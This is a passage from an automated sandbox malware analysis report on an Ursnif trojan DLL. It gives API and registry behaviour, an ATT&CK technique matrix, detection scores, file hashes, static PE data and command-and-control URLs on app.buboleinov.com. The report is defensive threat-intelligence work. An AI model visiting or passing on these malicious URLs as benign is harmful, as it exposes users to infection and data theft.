info,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_6C554020
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,3_2_6C546A76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,3_2_6C553A1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_6C553234
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6C54AAC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_6C556AF7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6C54AAFD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6C556AB7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_6C556B74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,3_2_6C556BF7
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6C501979 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_6C501979
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00503946 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_00503946
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6C50146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6C50146C
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected Ursnif
                      Yara detected Ursnif

                      Remote Access Functionality:

                      Yara detected Ursnif
                      Yara detected Ursnif

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation 2 | Path Interception | Process Injection 12 | Masquerading 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Encrypted Channel 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1
                      Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 1 | LSASS Memory | Security Software Discovery 3 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 12 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 2 | LSA Secrets | Account Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll32 1 | Cached Domain Credentials | System Owner/User Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 34 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                      Behavior Graph

                      [Behavior graph, image not reproduced. Behavior Graph ID: 429225; Sample: shorefront.eps; Startdate: 03/06/2021; Architecture: WINDOWS; Score: 92. Signatures shown: Multi AV Scanner detection for domain / URL; Found malware configuration; Multi AV Scanner detection for submitted file; 3 other signatures. Process nodes: loaddll32.exe (Writes or reads registry keys via WMI; Writes registry values via WMI) started cmd.exe and three rundll32.exe instances, one of them flagged "Writes registry values via WMI"; cmd.exe started rundll32.exe; iexplore.exe started two iexplore.exe processes, each linked to app.buboleinov.com.]

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      shorefront.dll | 46% | Virustotal |
                      shorefront.dll | 54% | ReversingLabs | Win32.Trojan.Sdum
                      shorefront.dll | 100% | Joe Sandbox ML |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      3.2.rundll32.exe.4770000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
                      0.2.loaddll32.exe.500000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
                      6.2.rundll32.exe.3180000.1.unpack | 100% | Avira | HEUR/AGEN.1108168

                      Domains

                      Source | Detection | Scanner | Label
                      app.buboleinov.com | 7% | Virustotal |

                      URLs

                      Source | Detection | Scanner | Label
                      http://app.buboleinov.com/7dGVcD7hOw3lYt5/1yqoO_2BT5cAFQCvp3/7fGu2bPOM/Y70HlHuovLn2gp_2B2GH/4_2FYxaP | 0% | Avira URL Cloud | safe
                      http://app.buboleinov.com/BHxjQVeA3bCRL3A0U_2Bhx/6Mf2XW6xM9nlO/OBBDiHLG/gVHcEz5iH6i5Er6PkMAnMWX/IOi2 | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      app.buboleinov.com | unknown | unknown | true | | unknown

                      URLs from Memory and Binaries

                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://app.buboleinov.com/7dGVcD7hOw3lYt5/1yqoO_2BT5cAFQCvp3/7fGu2bPOM/Y70HlHuovLn2gp_2B2GH/4_2FYxaP | ~DF762A57E90D6A65CD.TMP.12.dr, {B147A470-C485-11EB-90EB-ECF4BBEA1588}.dat.12.dr | true | Avira URL Cloud: safe | unknown
                      http://app.buboleinov.com/BHxjQVeA3bCRL3A0U_2Bhx/6Mf2XW6xM9nlO/OBBDiHLG/gVHcEz5iH6i5Er6PkMAnMWX/IOi2 | {B147A472-C485-11EB-90EB-ECF4BBEA1588}.dat.12.dr | true | Avira URL Cloud: safe | unknown

                      Contacted IPs

                      No contacted IP infos

                      General Information

                      Joe Sandbox Version:32.0.0 Black Diamond
                      Analysis ID:429225
                      Start date:03.06.2021
                      Start time:18:04:14
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 7m 26s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:shorefront.eps (renamed file extension from eps to dll)
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:15
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal92.troj.winDLL@16/17@6/0
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 16.6% (good quality ratio 15.8%)
                      • Quality average: 79.5%
                      • Quality standard deviation: 28.7%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 77
                      • Number of non-executed functions: 120
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      Warnings:
                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted)
                      • Excluded domains from analysis (whitelisted)
                      • Not all processes were analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.

                      Simulations

                      Behavior and APIs

                      Time | Type | Description
                      18:06:28 | API Interceptor | 1x Sleep call for process: rundll32.exe modified

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASN

                      No context

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B147A46E-C485-11EB-90EB-ECF4BBEA1588}.dat
                      Process:C:\Program Files\internet explorer\iexplore.exe
                      File Type:Microsoft Word Document
                      Category:dropped
                      Size (bytes):50344
                      Entropy (8bit):1.9993845315328929
                      Encrypted:false
                      SSDEEP:192:r7ZYZdg2QjW0StiifcBPzMgHB+HDMKzcIwpSuM62pSbKpif8qpitkwNkimRwxkES:rN4FdxL900tk+dY1
                      MD5:7978357DDA034C05E56F55DA35366205
                      SHA1:48E4CABD925132F6A720DBF850A937DFCCC69152
                      SHA-256:6B8EEF1FA301C04940AA30E7958CFA1C07D64E11423141A358089F78E59A2F6A
                      SHA-512:1EEDC44DAFC7B64B1D1A1F26CBC74940EE74451114AA089D2C2B5C6B130A3C52E86B6137B4723D74066F57A50A1F2714C28AC7FAFD6AFF32A4D1FCDE53C8AC41
                      Malicious:false
                      Reputation:low
                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B147A470-C485-11EB-90EB-ECF4BBEA1588}.dat
                      Process:C:\Program Files\internet explorer\iexplore.exe
                      File Type:Microsoft Word Document
                      Category:dropped
                      Size (bytes):27588
                      Entropy (8bit):1.9124316644431674
                      Encrypted:false
                      SSDEEP:192:rIZvQf6hkOjt2lWeMGVwmJ06ibFVwmJ06ixmmA:rIoSSIk83qhIbhIwx
                      MD5:2E09A548EF11126190EFD8E8398EFBB9
                      SHA1:17B8746C47A049ACAA52C304C607FC7E2F192F2B
                      SHA-256:80ABDEBCCF9BCFC80CAE6DB09CB39304A8338B6927C70E988258FCE27FB8D74D
                      SHA-512:C827881750C667D70195CD98D9279DC92C4EDFEC76925A4CF12969F00DBA76B63B5B89BF6ECF88A2D803B3351C46ED78DE8BC2D1BE5E12CB8884376A63BDEE62
                      Malicious:false
                      Reputation:low
                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B147A472-C485-11EB-90EB-ECF4BBEA1588}.dat
                      Process:C:\Program Files\internet explorer\iexplore.exe
                      File Type:Microsoft Word Document
                      Category:dropped
                      Size (bytes):28156
                      Entropy (8bit):1.922108016741325
                      Encrypted:false
                      SSDEEP:96:roZvQr69BS/jl2FW1MpdphCuQbKolpIK9hCuQeOA:roZvQr69k/jl2FW1Mpdpw9lpfwnA
                      MD5:99B43810D1B0B8FB2D4795325EBFF699
                      SHA1:2BEA2EB826754881F2135787DE63991849271614
                      SHA-256:891910C972C0E0B618F60AE4B2ACDE679390016D197D089D3DAD579BBB31EB46
                      SHA-512:B17DFCDE50DACF718C2CC975DE6F5725FD4E64ED73402D04512318F5F4D6EFA092E80E58ADEFC5BFA58695969AF98BB7A286E715F35BD5BD5C437FC6211AB7D2
                      Malicious:false
                      Reputation:low
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\NewErrorPageTemplate[1]
                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:downloaded
                      Size (bytes):1612
                      Entropy (8bit):4.869554560514657
                      Encrypted:false
                      SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                      MD5:DFEABDE84792228093A5A270352395B6
                      SHA1:E41258C9576721025926326F76063C2305586F76
                      SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                      SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                      Malicious:false
                      IE Cache URL:res://ieframe.dll/NewErrorPageTemplate.css
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\dnserror[1]
                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                      File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):2997
                      Entropy (8bit):4.4885437940628465
                      Encrypted:false
                      SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                      MD5:2DC61EB461DA1436F5D22BCE51425660
                      SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                      SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                      SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                      Malicious:false
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\down[1]
                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                      File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                      Category:dropped
                      Size (bytes):748
                      Entropy (8bit):7.249606135668305
                      Encrypted:false
                      SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                      MD5:C4F558C4C8B56858F15C09037CD6625A
                      SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                      SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                      SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                      Malicious:false
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\errorPageStrings[1]
                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):4720
                      Entropy (8bit):5.164796203267696
                      Encrypted:false
                      SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                      MD5:D65EC06F21C379C87040B83CC1ABAC6B
                      SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                      SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                      SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                      Malicious:false
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\httpErrorPagesScripts[1]
                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:downloaded
                      Size (bytes):12105
                      Entropy (8bit):5.451485481468043
                      Encrypted:false
                      SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                      MD5:9234071287E637F85D721463C488704C
                      SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                      SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                      SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                      Malicious:false
                      IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\down[1]
                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                      File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                      Category:downloaded
                      Size (bytes):748
                      Entropy (8bit):7.249606135668305
                      Encrypted:false
                      SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                      MD5:C4F558C4C8B56858F15C09037CD6625A
                      SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                      SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                      SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                      Malicious:false
                      IE Cache URL:res://ieframe.dll/down.png
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\httpErrorPagesScripts[1]
                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):12105
                      Entropy (8bit):5.451485481468043
                      Encrypted:false
                      SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                      MD5:9234071287E637F85D721463C488704C
                      SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                      SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                      SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                      Malicious:false
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\NewErrorPageTemplate[1]
                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1612
                      Entropy (8bit):4.869554560514657
                      Encrypted:false
                      SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                      MD5:DFEABDE84792228093A5A270352395B6
                      SHA1:E41258C9576721025926326F76063C2305586F76
                      SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                      SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                      Malicious:false
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\dnserror[1]
                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                      File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:downloaded
                      Size (bytes):2997
                      Entropy (8bit):4.4885437940628465
                      Encrypted:false
                      SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                      MD5:2DC61EB461DA1436F5D22BCE51425660
                      SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                      SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                      SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                      Malicious:false
                      IE Cache URL:res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=9003
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\errorPageStrings[1]
                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:downloaded
                      Size (bytes):4720
                      Entropy (8bit):5.164796203267696
                      Encrypted:false
                      SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                      MD5:D65EC06F21C379C87040B83CC1ABAC6B
                      SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                      SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                      SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                      Malicious:false
                      IE Cache URL:res://ieframe.dll/errorPageStrings.js
                      Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                      C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):89
                      Entropy (8bit):4.457498499025032
                      Encrypted:false
                      SSDEEP:3:oVXUbVCE9Ts4T48JOGXnEbVCE9Ts4uk+n:o9Urn4qErq
                      MD5:330A46A120DAA4AA27765FF48C17CFA2
                      SHA1:D64846D9E5996A84A50FE3522DF95B8D995D187C
                      SHA-256:4C01D98C1E31356C9F8DDB63A2320560DF77C8A37B6215E8C51E4440AFFECC12
                      SHA-512:3DD1DED3DDE41C97ED2C1D32E9065F58D9FC8272D403D0BD7B2DFEEEE064A924AE80049DEF6917EFF2861F795F741AA7FCBE281E7D17EF49B0A26F0CD50C5245
                      Malicious:false
                      Preview: [2021/06/03 18:06:46.920] Latest deploy version: ..[2021/06/03 18:06:46.920] 11.211.2 ..
                      C:\Users\user\AppData\Local\Temp\~DF2325E3FA7AA39907.TMP
                      Process:C:\Program Files\internet explorer\iexplore.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):40185
                      Entropy (8bit):0.6775647831808976
                      Encrypted:false
                      SSDEEP:96:kBqoxKAuvScS+EiIZCPphCuQbKephCuQbKZphCuQbK6:kBqoxKAuqR+EiIZCPpwVpwOpwT
                      MD5:69940C57E758F61ED876E80B30613A47
                      SHA1:643EE6264C9C8B4B54B84A83B7FCFF57B07F3B94
                      SHA-256:85E2C83108205161715618459450AEA91475F42DE1B577CE9E2BA86B0FE1BB8F
                      SHA-512:4353AFCF37B8DBD3E0B99D737F385125D3BF072A8ACB1FE27A57D08E239162AED77D2C6184297D553D61ACE72C2A1F1299E006BAAE9F65AC3E9FDC50808C2781
                      Malicious:false
                      C:\Users\user\AppData\Local\Temp\~DF762A57E90D6A65CD.TMP
                      Process:C:\Program Files\internet explorer\iexplore.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):40073
                      Entropy (8bit):0.6558580738443309
                      Encrypted:false
                      SSDEEP:192:kBqoxKAuqR+tzxQTWwmJ06iRwmJ06iqwmJ06if:kBqoxKAuqR+tzxQTWhIRhIqhIf
                      MD5:BED294CA39E721D92EE7C908AFAA80A9
                      SHA1:E3B390F086560AF18F1C96F3633448B5B431C6D3
                      SHA-256:52A5530CAFACE2F1C8A1D6D9B4E4B7A315236B316C6EF2C491278A9719F0B599
                      SHA-512:740F9AE6B38ECC70861E1D4B746238D970EA40EA84B17276897ABCBA19D90D93DFFFDEF811D5F0D053EACEBD4A0B400E2B70BB3BCC41539DA707E44DF4A89781
                      Malicious:false
                      C:\Users\user\AppData\Local\Temp\~DF896FBAE33087E32E.TMP
                      Process:C:\Program Files\internet explorer\iexplore.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):13237
                      Entropy (8bit):0.5972692611662705
                      Encrypted:false
                      SSDEEP:24:c9lLh9lLh9lIn9lIn9loJ9lop9lWnxTV929:kBqoIysrG
                      MD5:E96BA0BC747494236BC0429356C61A71
                      SHA1:50C56F2FB54ACF0D56C65C1F92B43894B8247773
                      SHA-256:0FCB065D36956D9134F1DEAFE195677B90F3143C534147A4E91FB53DBFE1A301
                      SHA-512:139FF4AB662834360F7D752A01ED0D14308FC85E782DEF0D10CCFBF0C2999DC1EBE105B5B1938BD5A34709D2A55C812D43D79F7DD3F0276F575BB2DF07A67A40
                      Malicious:false

                      Static File Info

                      General

                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):6.166903919730553
                      TrID:
                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                      • Generic Win/DOS Executable (2004/3) 0.20%
                      • DOS Executable Generic (2002/1) 0.20%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:shorefront.dll
                      File size:393728
                      MD5:b3526bc3c4a61f9f09ac31ee9a5fc8a5
                      SHA1:d92ac3fa9cca4ed8273111f767e24d8f53896787
                      SHA256:f4a464c2e5f14cd4c391a9b5ba60deca36ccaa6c1503a097eeb0c5070945d1fb
                      SHA512:0583e811619ea1ce40c430436e91b8b216fc509e7c75ed7132fdccc9f52f1828f50dbca6cd4b973090962fe6e8b76e298b0fe43b56ea2485810d4dc52e033fdb
                      SSDEEP:6144:hC5FUWwNmY036ua+71w5uJEr+AitTdyh+a6R+/ZQWdB:0FBwNuKu4umqAinyh+7+h1H
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pS...........!.........$.......W..............................................K.....@.............................m..

                      File Icon

                      Icon Hash:74f0e4ecccdce0e4

                      Static PE Info

                      General

                      Entrypoint:0x1045798
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x1000000
                      Subsystem:windows gui
                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x53700FF7 [Mon May 12 00:04:07 2014 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:6
                      OS Version Minor:0
                      File Version Major:6
                      File Version Minor:0
                      Subsystem Version Major:6
                      Subsystem Version Minor:0
                      Import Hash:f97da13a5df33dbcb72f17527b1d6819

                      Entrypoint Preview

                      Instruction
                      push ebp
                      mov ebp, esp
                      cmp dword ptr [ebp+0Ch], 01h
                      jne 00007F6174C5A777h
                      call 00007F6174C64340h
                      push dword ptr [ebp+10h]
                      push dword ptr [ebp+0Ch]
                      push dword ptr [ebp+08h]
                      call 00007F6174C5A77Ch
                      add esp, 0Ch
                      pop ebp
                      retn 000Ch
                      push 0000000Ch
                      push 0105B7D8h
                      call 00007F6174C602DEh
                      xor eax, eax
                      inc eax
                      mov esi, dword ptr [ebp+0Ch]
                      test esi, esi
                      jne 00007F6174C5A77Eh
                      cmp dword ptr [020691B4h], esi
                      je 00007F6174C5A85Ah
                      and dword ptr [ebp-04h], 00000000h
                      cmp esi, 01h
                      je 00007F6174C5A777h
                      cmp esi, 02h
                      jne 00007F6174C5A7A7h
